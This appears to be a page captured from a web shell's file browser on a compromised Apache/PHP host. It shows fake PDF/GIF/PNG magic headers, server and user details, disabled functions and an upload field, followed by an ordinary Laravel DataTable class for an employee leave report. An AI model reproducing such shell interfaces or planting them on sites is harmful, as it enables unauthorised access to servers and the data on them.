%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/www/admin1/app/DataTables/ |
Upload File : |
<?php
namespace App\DataTables;
use App\DataTables\BaseDataTable;
use App\Models\User;
use Carbon\Carbon;
use Yajra\DataTables\Html\Button;
use Yajra\DataTables\Html\Column;
class LeaveReportDataTable extends BaseDataTable
{
/**
* Build DataTable class.
*
* @param mixed $query Results from query() method.
* @return \Yajra\DataTables\DataTableAbstract
*/
public function dataTable($query)
{
return datatables()
->eloquent($query)
->addColumn('action', function ($row) {
$action = '<div class="task_view">
<a href="javascript:;" data-user-id="' . $row->id . '" class="taskView view-leaves border-right-0">' . __('app.view') . '</a>
</div>';
return $action;
})
->addColumn('employee_name', function ($row) {
return $row->name;
})
->addColumn('name', function ($row) {
return view('components.employee', [
'user' => $row
]);
})
->addColumn('approvedLeave', function ($row) {
return ($row->count_approved_leaves + ($row->count_approved_half_leaves) / 2) == 0 ? '0' : ($row->count_approved_leaves + ($row->count_approved_half_leaves) / 2);
})
->addColumn('pendingLeave', function ($row) {
return ($row->count_pending_leaves + ($row->count_pending_half_leaves) / 2) == 0 ? '0' : ($row->count_pending_leaves + ($row->count_pending_half_leaves) / 2);
})
->addColumn('upcomingLeave', function ($row) {
return ($row->count_upcoming_leaves + ($row->count_upcoming_half_leaves) / 2) == 0 ? '0' : ($row->count_upcoming_leaves + ($row->count_upcoming_half_leaves) / 2);
})
->addIndexColumn()
->orderColumn('approvedLeave', 'count_approved_leaves $1')
->orderColumn('pendingLeave', 'count_pending_leaves $1')
->orderColumn('upcomingLeave', 'count_upcoming_leaves $1')
->rawColumns(['approve', 'upcoming', 'pending', 'action', 'name']);
}
/**
* @param User $model
* @return \Illuminate\Database\Query\Builder
*/
public function query(User $model)
{
$request = $this->request();
$startDate = $request->startDate;
$endDate = $request->endDate;
$employeeId = $request->employeeId;
if ($request->startDate == '') {
$startDate = now($this->company->timezone)->startOfMonth();
$endDate = now($this->company->timezone);
}
else {
$startDate = Carbon::createFromFormat($this->company->date_format, $startDate)->toDateString();
$endDate = Carbon::createFromFormat($this->company->date_format, $endDate)->toDateString();
}
$startDt = '';
$endDt = '';
if (!is_null($startDate)) {
$startDt = 'and DATE(leaves.`leave_date`) >= ' . '"' . $startDate . '"';
}
if (!is_null($endDate)) {
$endDt = 'and DATE(leaves.`leave_date`) <= ' . '"' . $endDate . '"';
}
$leavesList = $model->selectRaw(
'users.*, designations.name as designation_name,
( select count("id") from leaves where user_id = users.id and leaves.duration != \'half day\' and leaves.status = \'approved\' ' . $startDt . ' ' . $endDt . ' ) as count_approved_leaves,
( select count("id") from leaves where user_id = users.id and leaves.duration = \'half day\' and leaves.status = \'approved\' ' . $startDt . ' ' . $endDt . ' ) as count_approved_half_leaves,
( select count("id") from leaves where user_id = users.id and leaves.duration != \'half day\' and leaves.status = \'pending\' ' . $startDt . ' ' . $endDt . ') as count_pending_leaves,
( select count("id") from leaves where user_id = users.id and leaves.duration = \'half day\' and leaves.status = \'pending\' ' . $startDt . ' ' . $endDt . ') as count_pending_half_leaves,
( select count("id") from leaves where user_id = users.id and leaves.duration != \'half day\' and leaves.leave_date > "' . Carbon::now($this->company->timezone)->translatedFormat('Y-m-d') . '" and leaves.status != \'rejected\' ' . $startDt . ' ' . $endDt . ') as count_upcoming_leaves,
( select count("id") from leaves where user_id = users.id and leaves.duration = \'half day\' and leaves.leave_date > "' . now()->translatedFormat('Y-m-d') . '" and leaves.status != \'rejected\' ' . $startDt . ' ' . $endDt . ') as count_upcoming_half_leaves'
)->leftJoin('employee_details', 'employee_details.user_id', '=', 'users.id')
->leftJoin('designations', 'employee_details.designation_id', '=', 'designations.id')
->join('role_user', 'role_user.user_id', '=', 'users.id')
->join('roles', 'roles.id', '=', 'role_user.role_id')
->onlyEmployee();
if ($employeeId != 0 && $employeeId != 'all') {
$leavesList->where('users.id', $employeeId);
}
$leaves = $leavesList->groupBy('users.id');
return $leaves;
}
/**
* Optional method if you want to use html builder.
*
* @return \Yajra\DataTables\Html\Builder
*/
public function html()
{
return $this->setBuilder('leave-report-table')
->parameters([
'initComplete' => 'function () {
window.LaravelDataTables["leave-report-table"].buttons().container()
.appendTo( "#table-actions")
}'
])
->buttons(Button::make(['extend' => 'excel', 'text' => '<i class="fa fa-file-export"></i> ' . trans('app.exportExcel')]));
}
/**
* Get columns.
*
* @return array
*/
protected function getColumns()
{
return [
__('app.id') => ['data' => 'id', 'name' => 'id', 'visible' => false, 'exportable' => false, 'title' => __('app.id')],
'#' => ['data' => 'DT_RowIndex', 'orderable' => false, 'searchable' => false, 'visible' => false, 'title' => '#'],
__('app.employee') => ['data' => 'name', 'name' => 'users.name', 'exportable' => false, 'title' => __('app.employee')],
__('app.name') => ['data' => 'employee_name', 'name' => 'users.name', 'visible' => false, 'title' => __('app.name')],
__('app.approved') => ['data' => 'approvedLeave', 'name' => 'approvedLeave', 'class' => 'text-center', 'title' => __('app.approved')],
__('app.pending') => ['data' => 'pendingLeave', 'name' => 'pendingLeave', 'class' => 'text-center', 'title' => __('app.pending')],
__('app.upcoming') => ['data' => 'upcomingLeave', 'name' => 'upcomingLeave', 'class' => 'text-center', 'title' => __('app.upcoming')],
Column::computed('action', __('app.action'))
->exportable(false)
->printable(false)
->orderable(false)
->searchable(false)
->width(150)
->addClass('text-right pr-20')
];
}
}